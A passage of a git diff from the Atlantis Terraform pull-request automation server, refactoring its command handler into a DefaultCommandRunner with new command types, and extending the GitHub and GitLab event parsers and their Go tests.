c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) - var cr CommandResponse - switch ctx.Command.Name { - case Plan: - if ctx.Command.Autoplan { - cr = c.PullRequestOperator.Autoplan(ctx) - } else { - cr = c.PullRequestOperator.PlanViaComment(ctx) - } - case Apply: - cr = c.PullRequestOperator.ApplyViaComment(ctx) - default: - ctx.Log.Err("failed to determine desired command, neither plan nor apply") + results, err := commandRunner() + if err != nil { + c.updatePull(ctx, command, CommandResult{Error: err}) + return } - c.updatePull(ctx, cr) + c.updatePull(ctx, command, CommandResult{ProjectResults: results}) } -func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { +func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) { // Log if we got any errors or failures. if res.Error != nil { ctx.Log.Err(res.Error.Error()) @@ -192,15 +237,15 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { } // Update the pull request's status icon and comment back. - if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil { + if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, command.CommandName(), res); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan) + comment := c.MarkdownRenderer.Render(res, command.CommandName(), ctx.Log.History.String(), command.IsVerbose(), command.IsAutoplan()) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck } // logPanics logs and creates a comment on the pull request for panics. -func (c *CommandHandler) logPanics(ctx *CommandContext) { +func (c *DefaultCommandRunner) logPanics(ctx *CommandContext) { if err := recover(); err != nil { stack := recovery.Stack(3) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go new file mode 100644 index 0000000000..a0d636c9a8 --- /dev/null +++ b/server/events/command_runner_test.go @@ -0,0 +1,239 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events_test + +import ( + "bytes" + "log" + "testing" + + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/mocks" + vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" + logmocks "github.com/runatlantis/atlantis/server/logging/mocks" + //. "github.com/runatlantis/atlantis/testing" +) + +var projectCommandBuilder *mocks.MockProjectCommandBuilder +var eventParsing *mocks.MockEventParsing +var vcsClient *vcsmocks.MockClientProxy +var ghStatus *mocks.MockCommitStatusUpdater +var githubGetter *mocks.MockGithubPullGetter +var gitlabGetter *mocks.MockGitlabMergeRequestGetter +var workspaceLocker *mocks.MockAtlantisWorkspaceLocker +var ch events.DefaultCommandRunner +var logBytes *bytes.Buffer + +func setup(t *testing.T) { + RegisterMockTestingT(t) + projectCommandBuilder = mocks.NewMockProjectCommandBuilder() + eventParsing = mocks.NewMockEventParsing() + ghStatus = mocks.NewMockCommitStatusUpdater() + workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() + vcsClient = vcsmocks.NewMockClientProxy() + githubGetter = mocks.NewMockGithubPullGetter() + gitlabGetter = mocks.NewMockGitlabMergeRequestGetter() + logger := logmocks.NewMockSimpleLogging() + logBytes = new(bytes.Buffer) + When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) + ch = events.DefaultCommandRunner{ + VCSClient: vcsClient, + CommitStatusUpdater: ghStatus, + EventParser: eventParsing, + MarkdownRenderer: &events.MarkdownRenderer{}, + GithubPullGetter: githubGetter, + GitlabMergeRequestGetter: gitlabGetter, + Logger: logger, + AllowForkPRs: false, + AllowForkPRsFlag: "allow-fork-prs-flag", + ProjectCommandBuilder: projectCommandBuilder, + } +} + +//func TestExecuteCommand_LogPanics(t *testing.T) { +// t.Log("if there is a panic it is commented back on the pull request") +// setup(t) +// ch.AllowForkPRs = true // Lets us get to the panic code. +// defer func() { ch.AllowForkPRs = false }() +// When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) +// _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() +// Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") +//} +// +//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { +// t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") +// setup(t) +// ch.GithubPullGetter = nil +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) +//} +// +//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { +// t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") +// setup(t) +// ch.GitlabMergeRequestGetter = nil +// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GithubPullErr(t *testing.T) { +// t.Log("if getting the github pull request fails an error should be logged") +// setup(t) +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { +// t.Log("if getting the gitlab merge request fails an error should be logged") +// setup(t) +// When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) +// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GithubPullParseErr(t *testing.T) { +// t.Log("if parsing the returned github pull request fails an error should be logged") +// setup(t) +// var pull github.PullRequest +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) +// +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_ForkPRDisabled(t *testing.T) { +// t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + +// " comment saying that this is not allowed") +// setup(t) +// ch.AllowForkPRs = false // by default it's false so don't need to reset +// var pull github.PullRequest +// modelPull := models.PullRequest{State: models.Open} +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// +// headRepo := fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) +// +// ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) +//} +// +//func TestExecuteCommand_ClosedPull(t *testing.T) { +// t.Log("if a command is run on a closed pull request atlantis should" + +// " comment saying that this is not allowed") +// setup(t) +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// modelPull := models.PullRequest{State: models.Closed} +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) +// +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") +//} +// +//func TestExecuteCommand_WorkspaceLocked(t *testing.T) { +// t.Log("if the workspace is locked, should comment back on the pull") +// setup(t) +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// msg := "The workspace workspace is currently locked by another" + +// " command that is running for this pull request." + +// " Wait until the previous command is complete and try again." +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) +// _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, msg, result.Failure) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, +// "**Plan Failed**: "+msg+"\n\n") +//} +// +//func TestExecuteCommand_FullRun(t *testing.T) { +// t.Log("when running a plan, apply should comment") +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// cmdResult := events.CommandResult{} +// for _, c := range []events.CommandName{events.Plan, events.Apply} { +// setup(t) +// cmd := events.CommentCommand{ +// Name: c, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// switch c { +// case events.Plan: +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// case events.Apply: +// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// } +// +// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResult, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +// } +//} +// +//func TestExecuteCommand_ForkPREnabled(t *testing.T) { +// t.Log("when running a plan on a fork PR, it should succeed") +// setup(t) +// +// // Enable forked PRs. +// ch.AllowForkPRs = true +// defer func() { ch.AllowForkPRs = false }() // Reset after test. +// +// var pull github.PullRequest +// cmdResponse := events.CommandResult{} +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// headRepo := fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) +// +// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResponse, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +//} diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index 808d4493a9..c6f9f24395 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -59,7 +59,7 @@ type CommentParser struct { type CommentParseResult struct { // Command is the successfully parsed command. Will be nil if // CommentResponse or Ignore is set. - Command *Command + Command *CommentCommand // CommentResponse is set when we should respond immediately to the command // for example for atlantis help. CommentResponse string @@ -215,7 +215,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, project), } } diff --git a/server/events/commit_status_updater.go b/server/events/commit_status_updater.go index 3debcd43fe..ba5a235036 100644 --- a/server/events/commit_status_updater.go +++ b/server/events/commit_status_updater.go @@ -27,10 +27,10 @@ import ( // the status to signify whether the plan/apply succeeds. type CommitStatusUpdater interface { // Update updates the status of the head commit of pull. - Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error + Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error // UpdateProjectResult updates the status of the head commit given the // state of response. - UpdateProjectResult(ctx *CommandContext, res CommandResponse) error + UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error } // DefaultCommitStatusUpdater implements CommitStatusUpdater. @@ -39,13 +39,13 @@ type DefaultCommitStatusUpdater struct { } // Update updates the commit status. -func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error { - description := fmt.Sprintf("%s %s", strings.Title(cmd.Name.String()), strings.Title(status.String())) +func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error { + description := fmt.Sprintf("%s %s", strings.Title(command.String()), strings.Title(status.String())) return d.Client.UpdateStatus(repo, pull, status, description) } // UpdateProjectResult updates the commit status based on the status of res. -func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, res CommandResponse) error { +func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error { var status vcs.CommitStatus if res.Error != nil || res.Failure != "" { status = vcs.Failed @@ -56,7 +56,7 @@ func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, re } status = d.worstStatus(statuses) } - return d.Update(ctx.BaseRepo, ctx.Pull, status, ctx.Command) + return d.Update(ctx.BaseRepo, ctx.Pull, status, commandName) } func (d *DefaultCommitStatusUpdater) worstStatus(ss []vcs.CommitStatus) vcs.CommitStatus { diff --git a/server/events/commit_status_updater_test.go b/server/events/commit_status_updater_test.go index 7d05264b04..155822dc19 100644 --- a/server/events/commit_status_updater_test.go +++ b/server/events/commit_status_updater_test.go @@ -29,26 +29,12 @@ import ( var repoModel = models.Repo{} var pullModel = models.PullRequest{} var status = vcs.Success -var cmd = events.Command{ - Name: events.Plan, -} - -func TestStatus_String(t *testing.T) { - cases := map[vcs.CommitStatus]string{ - vcs.Pending: "pending", - vcs.Success: "success", - vcs.Failed: "failed", - } - for k, v := range cases { - Equals(t, v, k.String()) - } -} func TestUpdate(t *testing.T) { RegisterMockTestingT(t) client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.Update(repoModel, pullModel, status, &cmd) + err := s.Update(repoModel, pullModel, status, events.Plan) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, status, "Plan Success") } @@ -58,11 +44,10 @@ func TestUpdateProjectResult_Error(t *testing.T) { ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, events.CommandResponse{Error: errors.New("err")}) + err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Error: errors.New("err")}) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed") } @@ -72,23 +57,20 @@ func TestUpdateProjectResult_Failure(t *testing.T) { ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, events.CommandResponse{Failure: "failure"}) + err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Failure: "failure"}) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed") } func TestUpdateProjectResult(t *testing.T) { - t.Log("should use worst status") RegisterMockTestingT(t) ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } cases := []struct { @@ -126,25 +108,31 @@ func TestUpdateProjectResult(t *testing.T) { } for _, c := range cases { - var results []events.ProjectResult - for _, statusStr := range c.Statuses { - var result events.ProjectResult - switch statusStr { - case "failure": - result = events.ProjectResult{Failure: "failure"} - case "error": - result = events.ProjectResult{Error: errors.New("err")} - default: - result = events.ProjectResult{} + t.Run(strings.Join(c.Statuses, "-"), func(t *testing.T) { + var results []events.ProjectResult + for _, statusStr := range c.Statuses { + var result events.ProjectResult + switch statusStr { + case "failure": + result = events.ProjectResult{ + ProjectCommandResult: events.ProjectCommandResult{Failure: "failure"}, + } + case "error": + result = events.ProjectResult{ + ProjectCommandResult: events.ProjectCommandResult{Error: errors.New("err")}, + } + default: + result = events.ProjectResult{} + } + results = append(results, result) } - results = append(results, result) - } - resp := events.CommandResponse{ProjectResults: results} + resp := events.CommandResult{ProjectResults: results} - client := mocks.NewMockClientProxy() - s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, resp) - Ok(t, err) - client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String())) + client := mocks.NewMockClientProxy() + s := events.DefaultCommitStatusUpdater{Client: client} + err := s.UpdateProjectResult(ctx, events.Plan, resp) + Ok(t, err) + client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String())) + }) } } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index dbdccc8e50..3bf4e7f157 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -34,7 +34,27 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing -type Command struct { +type CommandInterface interface { + CommandName() CommandName + IsVerbose() bool + IsAutoplan() bool +} + +type AutoplanCommand struct{} + +func (c AutoplanCommand) CommandName() CommandName { + return Plan +} + +func (c AutoplanCommand) IsVerbose() bool { + return false +} + +func (c AutoplanCommand) IsAutoplan() bool { + return true +} + +type CommentCommand struct { // Dir is the path relative to the repo root to run the command in. // Will never be an empty string and will never end in "/". Dir string @@ -44,20 +64,29 @@ type Command struct { Name CommandName Verbose bool Workspace string - // Autoplan is true if the command is a plan command being executed in an - // attempt to automatically run plan. - Autoplan bool // ProjectName is the name of a project to run the command on. It refers to a // project specified in an atlantis.yaml file. ProjectName string } -func (c Command) String() string { - return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ",")) +func (c CommentCommand) CommandName() CommandName { + return c.Name +} + +func (c CommentCommand) IsVerbose() bool { + return c.Verbose +} + +func (c CommentCommand) IsAutoplan() bool { + return false +} + +func (c CommentCommand) String() string { + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ",")) } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand { // If dir was an empty string, this will return '.'. validDir := path.Clean(dir) if validDir == "/" { @@ -66,24 +95,27 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work if workspace == "" { workspace = DefaultWorkspace } - return &Command{ + return &CommentCommand{ Dir: validDir, Flags: flags, Name: name, Verbose: verbose, Workspace: workspace, - Autoplan: autoplan, ProjectName: project, } } type EventParsing interface { ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error) - // ParseGithubPull returns the pull request and head repo. - ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) + // ParseGithubPull returns the pull request, base repo and head repo. + ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) + // ParseGithubPullEvent returns the pull request, head repo and user that + // caused the event. Base repo is available as a field on PullRequest. + ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (pull models.PullRequest, baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) - // ParseGitlabMergeEvent returns the pull request, base repo and head repo. - ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) + // ParseGitlabMergeEvent returns the pull request, base repo, head repo and + // user that caused the event. + ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest } @@ -116,38 +148,58 @@ func (e *EventParser) ParseGithubIssueCommentEvent(comment *github.IssueCommentE return } -func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) { - var pullModel models.PullRequest - var headRepoModel models.Repo +func (e *EventParser) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { + if pullEvent.PullRequest == nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("pull_request is null") + } + pull, baseRepo, headRepo, err := e.ParseGithubPull(pullEvent.PullRequest) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err + } + if pullEvent.Sender == nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender is null") + } + senderUsername := pullEvent.Sender.GetLogin() + if senderUsername == "" { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender.login is null") + } + return pull, baseRepo, headRepo, models.User{Username: senderUsername}, nil +} +func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (pullModel models.PullRequest, baseRepo models.Repo, headRepo models.Repo, err error) { commit := pull.Head.GetSHA() if commit == "" { - return pullModel, headRepoModel, errors.New("head.sha is null") + err = errors.New("head.sha is null") + return } url := pull.GetHTMLURL() if url == "" { - return pullModel, headRepoModel, errors.New("html_url is null") + err = errors.New("html_url is null") + return } branch := pull.Head.GetRef() if branch == "" { - return pullModel, headRepoModel, errors.New("head.ref is null") + err = errors.New("head.ref is null") + return } authorUsername := pull.User.GetLogin() if authorUsername == "" { - return pullModel, headRepoModel, errors.New("user.login is null") + err = errors.New("user.login is null") + return } num := pull.GetNumber() if num == 0 { - return pullModel, headRepoModel, errors.New("number is null") + err = errors.New("number is null") + return } - baseRepoModel, err := e.ParseGithubRepo(pull.Base.Repo) + baseRepo, err = e.ParseGithubRepo(pull.Base.Repo) if err != nil { - return pullModel, headRepoModel, err + return } - headRepoModel, err = e.ParseGithubRepo(pull.Head.Repo) + headRepo, err = e.ParseGithubRepo(pull.Head.Repo) if err != nil { - return pullModel, headRepoModel, err + return } pullState := models.Closed @@ -155,22 +207,23 @@ func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequ pullState = models.Open } - return models.PullRequest{ + pullModel = models.PullRequest{ Author: authorUsername, Branch: branch, HeadCommit: commit, URL: url, Num: num, State: pullState, - BaseRepo: baseRepoModel, - }, headRepoModel, nil + BaseRepo: baseRepo, + } + return } func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) { return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken) } -func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { +func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { modelState := models.Closed if event.ObjectAttributes.State == gitlabPullOpened { modelState = models.Open @@ -180,11 +233,11 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) if err != nil { - return models.PullRequest{}, models.Repo{}, models.Repo{}, err + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err } headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken) if err != nil { - return models.PullRequest{}, models.Repo{}, models.Repo{}, err + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err } pull := models.PullRequest{ @@ -197,7 +250,11 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul BaseRepo: baseRepo, } - return pull, baseRepo, headRepo, err + user := models.User{ + Username: event.User.Username, + } + + return pull, baseRepo, headRepo, user, err } // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event. diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 1415ffba3f..d7ef7fce70 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -102,34 +102,91 @@ func TestParseGithubIssueCommentEvent(t *testing.T) { Equals(t, *comment.Issue.Number, pullNum) } +func TestParseGithubPullEvent(t *testing.T) { + _, _, _, _, err := parser.ParseGithubPullEvent(&github.PullRequestEvent{}) + ErrEquals(t, "pull_request is null", err) + + testEvent := deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.PullRequest.HTMLURL = nil + _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "html_url is null", err) + + testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.Sender = nil + _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "sender is null", err) + + testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.Sender.Login = nil + _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "sender.login is null", err) + + actPull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGithubPullEvent(&PullEvent) + Ok(t, err) + expBaseRepo := models.Repo{ + Owner: "owner", + FullName: "owner/repo", + CloneURL: "https://github-user:github-token@github.com/owner/repo.git", + SanitizedCloneURL: Repo.GetCloneURL(), + Name: "repo", + VCSHost: models.VCSHost{ + Hostname: "github.com", + Type: models.Github, + }, + } + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, expBaseRepo, actHeadRepo) + Equals(t, models.PullRequest{ + URL: Pull.GetHTMLURL(), + Author: Pull.User.GetLogin(), + Branch: Pull.Head.GetRef(), + HeadCommit: Pull.Head.GetSHA(), + Num: Pull.GetNumber(), + State: models.Open, + BaseRepo: expBaseRepo, + }, actPull) + Equals(t, models.User{Username: "user"}, actUser) +} + func TestParseGithubPull(t *testing.T) { testPull := deepcopy.Copy(Pull).(github.PullRequest) testPull.Head.SHA = nil - _, _, err := parser.ParseGithubPull(&testPull) + _, _, _, err := parser.ParseGithubPull(&testPull) ErrEquals(t, "head.sha is null", err) testPull = 